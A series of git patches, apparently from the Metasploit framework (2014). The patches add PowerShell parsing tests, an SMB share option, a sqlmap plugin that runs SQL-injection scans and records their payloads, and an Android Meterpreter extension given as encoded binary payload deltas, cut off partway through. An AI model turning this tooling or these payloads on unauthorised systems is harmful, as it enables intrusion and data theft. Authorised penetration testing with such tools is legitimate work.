     end
 
diff --git a/spec/lib/rex/exploitation/powershell/function_spec.rb b/spec/lib/rex/exploitation/powershell/function_spec.rb
index 6ad49989b9..bb9159fe21 100644
--- a/spec/lib/rex/exploitation/powershell/function_spec.rb
+++ b/spec/lib/rex/exploitation/powershell/function_spec.rb
@@ -35,7 +35,12 @@ describe Rex::Exploitation::Powershell::Function do
 
             [Parameter( Position = 1 )]
             [Type]
-            $ReturnType = [Void]
+            $ReturnType = [Void],
+
+            [String]$Parpy='hello',
+            [Integer] $puppy = 1,
+
+            [Array[]] $stuff = Array[],
         )
 
         $Domain = [AppDomain]::CurrentDomain
@@ -68,7 +73,11 @@ describe Rex::Exploitation::Powershell::Function do
       function.code.should eq example_function_with_params
       function.to_s.include?("function #{function_name} #{example_function_with_params}").should be_true
       function.params.should be_kind_of Array
-      function.params.length.should be == 2
+      function.params.length.should be == 5
+      function.params[0].klass.should eq 'Type[]'
+      function.params[0].name.should eq 'Parameters'
+      function.params[1].klass.should eq 'Type'
+      function.params[1].name.should eq 'ReturnType'
     end
   end
 

From 1a82a20c099945688b3b8ac331e4b3691d4a81ee Mon Sep 17 00:00:00 2001
From: j0hnf <jf@tinternet.org.uk>
Date: Mon, 16 Jun 2014 20:10:11 +0100
Subject: [PATCH 119/321] re-added incorrectly removed SMBSHARE option

---
 modules/auxiliary/admin/smb/check_dir_file.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/auxiliary/admin/smb/check_dir_file.rb b/modules/auxiliary/admin/smb/check_dir_file.rb
index 78840796e7..60751723d9 100644
--- a/modules/auxiliary/admin/smb/check_dir_file.rb
+++ b/modules/auxiliary/admin/smb/check_dir_file.rb
@@ -43,6 +43,7 @@ class Metasploit3 < Msf::Auxiliary
     )
 
     register_options([
+      OptString.new('SMBSHARE', [true, 'The name of an accessible share on the server', 'C$'])
       OptString.new('RPATH', [true, 'The name of the remote file/directory relative to the share']),
     ], self.class)
 

From 88c44bf4f58e72782cdff1507000d18348bee65a Mon Sep 17 00:00:00 2001
From: Brandon Perry <bperry.volatile@gmail.com>
Date: Fri, 4 Jul 2014 10:53:14 -0500
Subject: [PATCH 120/321] Create sqlmap_manager.rb

---
 lib/sqlmap/sqlmap_manager.rb | 50 ++++++++++++++++++++++++++++++++++++
 1 file changed, 50 insertions(+)
 create mode 100644 lib/sqlmap/sqlmap_manager.rb

diff --git a/lib/sqlmap/sqlmap_manager.rb b/lib/sqlmap/sqlmap_manager.rb
new file mode 100644
index 0000000000..86e9f4eac6
--- /dev/null
+++ b/lib/sqlmap/sqlmap_manager.rb
@@ -0,0 +1,50 @@
+require 'json'
+
+module Sqlmap
+  class Manager
+    def initialize(session)
+      @session = session
+    end
+
+    def new_task
+      res = @session.get("/task/new")
+      return JSON.parse(res.body)
+    end
+
+    def delete_task(task_id)
+      res = @session.get("/task/" + task_id + "/delete")
+      return JSON.parse(res.body)
+    end
+
+    def set_option(task_id, key, value)
+      post = { key => value }
+      res = @session.post("/option/" + task_id + "/set", nil, post.to_json, {'ctype' => 'application/json'})
+      return JSON.parse(res.body)
+    end
+
+    def get_options(task_id)
+      res = @session.get("/option/" + task_id + "/list")
+      return JSON.parse(res.body)
+    end
+
+    def start_task(task_id, options = {})
+      res = @session.post("/scan/" + task_id + "/start" , nil, options.to_json, {'ctype' => 'application/json'})
+      return JSON.parse(res.body)
+    end
+
+    def get_task_status(task_id)
+      res = @session.get("/scan/" + task_id + "/status")
+      return JSON.parse(res.body)
+    end
+
+    def get_task_log(task_id)
+      res = @session.get("/scan/" + task_id + "/log")
+      return JSON.parse(res.body)
+    end
+
+    def get_task_data(task_id)
+      res = @session.get("/scan/" + task_id + "/data")
+      return JSON.parse(res.body)
+    end
+  end
+end

From 68a0e7c16e2d47968dd0cecc49ae0e6a3430f137 Mon Sep 17 00:00:00 2001
From: Brandon Perry <bperry.volatile@gmail.com>
Date: Fri, 4 Jul 2014 10:53:37 -0500
Subject: [PATCH 121/321] Create sqlmap_session.rb

---
 lib/sqlmap/sqlmap_session.rb | 37 ++++++++++++++++++++++++++++++++++++
 1 file changed, 37 insertions(+)
 create mode 100644 lib/sqlmap/sqlmap_session.rb

diff --git a/lib/sqlmap/sqlmap_session.rb b/lib/sqlmap/sqlmap_session.rb
new file mode 100644
index 0000000000..3fb64f7c88
--- /dev/null
+++ b/lib/sqlmap/sqlmap_session.rb
@@ -0,0 +1,37 @@
+module Sqlmap
+  class Session
+    def initialize(host, port = 8775)
+      @host = host
+      @port = port
+    end
+
+    def get(uri, headers = nil, params = nil)
+      c = Rex::Proto::Http::Client.new(@host, @port)
+      args = {
+        'uri' => uri
+      }
+
+      args['headers'] = headers if headers
+      args['vars_get'] = params if params
+      res = c.request_cgi(args)
+      res = c.send_recv(res)
+      return res
+    end
+
+    def post(uri, headers = nil, data = nil, originator_args = nil)
+      c = Rex::Proto::Http::Client.new(@host, @port)
+      args = {
+        'uri' => uri,
+        'method' => 'POST'
+      }
+
+      args.merge!(originator_args) if originator_args
+
+      args['headers'] = headers if headers
+      args['data'] = data if data
+      res = c.request_cgi(args)
+      res = c.send_recv(res)
+      return res
+    end
+  end
+end

From 6c18ee884e41fa902828c33335416a023567f06e Mon Sep 17 00:00:00 2001
From: Brandon Perry <bperry.volatile@gmail.com>
Date: Fri, 4 Jul 2014 10:54:07 -0500
Subject: [PATCH 122/321] Create sqlmap.rb

---
 plugins/sqlmap.rb | 287 ++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 287 insertions(+)
 create mode 100644 plugins/sqlmap.rb

diff --git a/plugins/sqlmap.rb b/plugins/sqlmap.rb
new file mode 100644
index 0000000000..7cc3ab767f
--- /dev/null
+++ b/plugins/sqlmap.rb
@@ -0,0 +1,287 @@
+require 'sqlmap/sqlmap_session'
+require 'sqlmap/sqlmap_manager'
+require 'json'
+
+module Msf
+  class Plugin::Sqlmap < Msf::Plugin
+    class SqlmapCommandDispatcher
+      include Msf::Ui::Console::CommandDispatcher
+
+      def name
+        "Sqlmap"
+      end
+
+      def commands
+        {
+          "sqlmap_new_task" => "It's a task!",
+          "sqlmap_connect" => "sqlmap_connect <host> [<port>]",
+          "sqlmap_list_tasks" => "List the knows tasks. Not stored in a DB, so lives as long as the console does",
+          "sqlmap_get_option" => "Get an option for a task",
+          "sqlmap_set_option" => "Set an option for a task",
+          "sqlmap_start_task" => "Start the task",
+          "sqlmap_get_status" => "Get the status of a task",
+          "sqlmap_get_log" => "Get the running log of a task",
+          "sqlmap_get_data" => "Get the resulting data of the task",
+          "sqlmap_save_data" => "Save the resulting data as web_vulns"
+        }
+      end
+
+      def cmd_sqlmap_connect(*args)
+        if args.length == 0
+          print_error("Need a host, and optionally a port")
+          return
+        end
+
+        host = args[0]
+        port = args.length == 2 ? args[1] : nil
+
+        if !port
+          @manager = Sqlmap::Manager.new(Sqlmap::Session.new(host))
+        else
+          @manager = Sqlmap::Manager.new(Sqlmap::Session.new(host, port))
+        end
+
+        print_good("Set connection settings for host " + host + (port ? " on port " + port : ""))
+      end
+
+      def cmd_sqlmap_set_option(*args)
+        if args.length != 3
+          print_error("Usage:")
+          print_error("\tsqlmap_set_option <taskid> <option_name> <option_value>")
+          return
+        end
+
+        if !@manager
+          print_error("Please run sqlmap_connect <host> first.")
+          return
+        end
+
+        val = args[2]
+        if args[2] =~ /^\d+$/
+          val = val.to_i
+        end
+
+        res = @manager.set_option(args[0], args[1], val)
+        print_status("Success: " + res["success"].to_s)
+      end
+
+      def cmd_sqlmap_start_task(*args)
+        if args.length == 0
+          print_error("Usage:")
+          print_error("\tsqlmap_start_task <taskid> [<url>]")
+          return
+        end
+
+        options = {}
+
+        if args.length == 2
+          options['url'] = args[1]
+        end
+
+        if !options['url'] && @tasks[args[0]]['url'] == ''
+          print_error("You need to specify a URL either as an argument to sqlmap_start_task or sqlmap_set_option")
+          return
+        end
+
+        if !@manager
+          print_error("Please run sqlmap_connect <host> first.")
+          return
+        end
+
+        res = @manager.start_task(args[0], options)
+        print_status("Started task: " + res["success"].to_s)
+      end
+
+      def cmd_sqlmap_get_log(*args)
+        if args.length != 1
+          print_error("Usage:")
+          print_error("\tsqlmap_get_log <taskid>")
+          return
+        end
+
+        if !@manager
+          print_error("Please run sqlmap_connect <host> first.")
+          return
+        end
+
+        res = @manager.get_task_log(args[0])
+
+        res["log"].each do |message|
+          print_status("[#{message["time"]}] #{message["level"]}: #{message["message"]}")
+        end
+      end
+
+      def cmd_sqlmap_get_status(*args)
+        if args.length != 1
+          print_error("Usage:")
+          print_error("\tsqlmap_get_status <taskid>")
+          return
+        end
+
+        if !@manager
+          print_error("Please run sqlmap_connect <host> first.")
+          return
+        end
+
+        res = @manager.get_task_status(args[0])
+
+        print_status("Status: " + res['status'])
+
+      end
+
+      def cmd_sqlmap_get_data(*args)
+        if args.length != 1
+          print_error("Usage:")
+          print_error("\tsqlmap_get_data <taskid>")
+          return
+        end
+
+        @tasks = {} if !@tasks
+
+        if !@manager
+          print_error("Please run sqlmap_connect <host> first.")
+          return
+        end
+
+        @tasks[args[0]] = @manager.get_options(args[0])["options"]
+
+        print_line
+        print_status("URL: " + @tasks[args[0]]['url'])
+
+        res = @manager.get_task_data(args[0])
+
+        tbl = Rex::Ui::Text::Table.new(
+          'Columns' => ['Title','Payload'])
+
+        res["data"].each do |d|
+          d["value"].each do |v|
+            v["data"].each do |i|
+              title = i[1]["title"].split('-')[0]
+              payload = i[1]["payload"]
+              tbl << [title, payload]
+            end
+          end
+        end
+
+        print_line
+        print_line tbl.to_s
+        print_line
+      end
+
+      def cmd_sqlmap_save_data(*args)
+        if args.length != 1
+          print_error("Usage:")
+          print_error("\tsqlmap_save_data <taskid>")
+          return
+        end
+
+        if !(framework.db && framework.db.usable)
+          print_error("No database is connected or usable")
+          return
+        end
+
+        @tasks = {} if !@tasks
+
+        if !@manager
+          print_error("Please run sqlmap_connect <host> first.")
+          return
+        end
+
+        @tasks[args[0]] = @manager.get_options(args[0])["options"]
+
+        print_line
+        print_status("URL: " + @tasks[args[0]]['url'])
+
+        res = @manager.get_task_data(args[0])
+        web_vuln_info = {}
+        url = @tasks[args[0]]['url']
+        proto = url.split(":")[0]
+        host = url.split("/")[2]
+        port = 80
+        port = host.split(":")[1] if host.index(":")
+        host = host.split(":")[0] if host.index(":")
+        path = '/' + (url.split("/")[3..(url.split("/").length - 1)].join('/'))
+        query = url.split("?")[1]
+        web_vuln_info[:web_site] = url
+        web_vuln_info[:path] = path
+        web_vuln_info[:query] = query
+        web_vuln_info[:host] = host
+        web_vuln_info[:port] = port
+        web_vuln_info[:ssl] = (proto =~ /https/)
+        web_vuln_info[:category] = "imported from sqlmap"
+        res["data"].each do |d|
+          d["value"].each do |v|
+            web_vuln_info[:pname] = v["parameter"]
+            web_vuln_info[:method] = v["place"]
+            web_vuln_info[:payload] = v["suffix"]
+            v["data"].each do |k,i|
+              web_vuln_info[:name] = i["title"]
+              web_vuln_info[:description] = res.to_json
+              web_vuln_info[:proof] = i["payload"]
+              framework.db.report_web_vuln(web_vuln_info)
+            end
+          end
+        end
+        print_good("Saved vulnerabilities to database.")    
+      end
+
+      def cmd_sqlmap_get_option(*args)
+        @tasks = {} if !@tasks
+        if args.length != 2
+          print_error("Usage:")
+          print_error("\tsqlmap_get_option <taskid> <option_name>")
+        end
+
+        if !@manager
+          print_error("Please run sqlmap_connect <host> first.")
+          return
+        end
+
+        task_options = @manager.get_options(args[0])
+        @tasks[args[0]] = task_options["options"]
+        print_good(args[1] + ": " + @tasks[args[0]][args[1]].to_s)
+      end
+
+      def cmd_sqlmap_new_task(*args)
+        @tasks = {} if !@tasks
+
+        if !@manager
+          print_error("Please run sqlmap_connect <host> first.")
+          return
+        end
+
+        taskid = @manager.new_task['taskid']
+        task_options = @manager.get_options(taskid)
+        @tasks[taskid] = task_options["options"]
+        print_good("Created task: " + taskid)
+      end
+
+      def cmd_sqlmap_list_tasks(*args)
+        @tasks = {} if !@tasks
+        @tasks.each do |task, options|
+          print_good("Task ID: " + task)
+        end
+      end
+    end
+
+    def initialize(framework, opts)
+      super
+
+      add_console_dispatcher(SqlmapCommandDispatcher)
+
+      print_status("Sqlmap plugin loaded")
+    end
+
+    def cleanup
+      remove_console_dispatcher('Sqlmap')
+    end
+
+    def name
+      "Sqlmap"
+    end
+
+    def desc
+      "Use Sqlmap, yo!"
+    end
+  end
+end

From 34dcb609e287dfb128e3c8b2b1c9382dd6d3ee45 Mon Sep 17 00:00:00 2001
From: AnwarMohamed <anwarelmakrahy@gmail.com>
Date: Tue, 8 Jul 2014 04:52:06 +0200
Subject: [PATCH 123/321] android extension

---
 data/android/apk/AndroidManifest.xml          | Bin 3540 -> 3680 bytes
 data/android/apk/classes.dex                  | Bin 10040 -> 17524 bytes
 data/android/apk/resources.arsc               | Bin 580 -> 584 bytes
 data/android/meterpreter.jar                  | Bin 38353 -> 41992 bytes
 data/android/metstage.jar                     | Bin 1851 -> 1851 bytes
 data/android/shell.jar                        | Bin 1853 -> 1853 bytes
 data/meterpreter/ext_server_android.jar       | Bin 0 -> 38782 bytes
 lib/msf/base/sessions/meterpreter_java.rb     |   5 +
 .../ui/console/command_dispatcher/android.rb  | 398 ++++++++++++++++++
 .../payloads/stages/android/meterpreter.rb    |  18 +-
 10 files changed, 420 insertions(+), 1 deletion(-)
 create mode 100644 data/meterpreter/ext_server_android.jar
 create mode 100644 lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb

diff --git a/data/android/apk/AndroidManifest.xml b/data/android/apk/AndroidManifest.xml
index 57e86cd85b8f352caeb6fec49f73ddec852c075a..8671dfed52c98005b2a05510b88b65a91b8e93de 100644
GIT binary patch
delta 370
zcmca2{Xj;RnSp~LfscWKkwJ#x4I2Z4Dgy#+m?&E<YsAXH-~+@7KwJmJbAWga5I+Ip
z9~(FRW?__`EXb@r`5X%uYcPW^L-6L6th|hycd!MpGKx=L$*wFa12mC?fq@xBGcyV>
zNC0W^$q(7Z86_t>@(549!NW6IgGYi_8YuoB3gjmH^4JT?Lv?~^CZJB0$p?AFCvV{q
z;8j3Ut2p^0kGQ20R4s^x*@B`9C=N2i0!V|@z-&?m=~h$$ih$e*qG7sGRTc7zt12ML
hf>grHkV6tzom|T+&Zs_lEw8wMI#dlXTp8Gb7y!$CUG4w?

delta 366
zcmaDLb46N~nSq1h3NHf#BZCaX1~vu;6$S)YGf}o$Qizp-K@EsqfH(<=i-33)5bxW#
z^*77rSFBu&n?JDyvGPg)_5FtenaK-zw0WhFL}VvBvI|ds!=vLW2NdOCU|<H(OpF3x
z3qfp{UU?u}1PEaOq{afs0g1!ZC`|syE^es^6akq8qM3oJKrTR01?0nYgVexuD}i(?
zDg#A8x<NEdH>#?$yyCnd^I)>dlNI^ICv))en8+ZBssY(BlevIwMyN|*;=nLvU<YCV
Dlwo55

diff --git a/data/android/apk/classes.dex b/data/android/apk/classes.dex
index ff39e87f11448e4c3543e9611c6a19b1d18aa857..2868666445d29452ccc713a4bd344d9f281bf066 100644
GIT binary patch
literal 17524
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
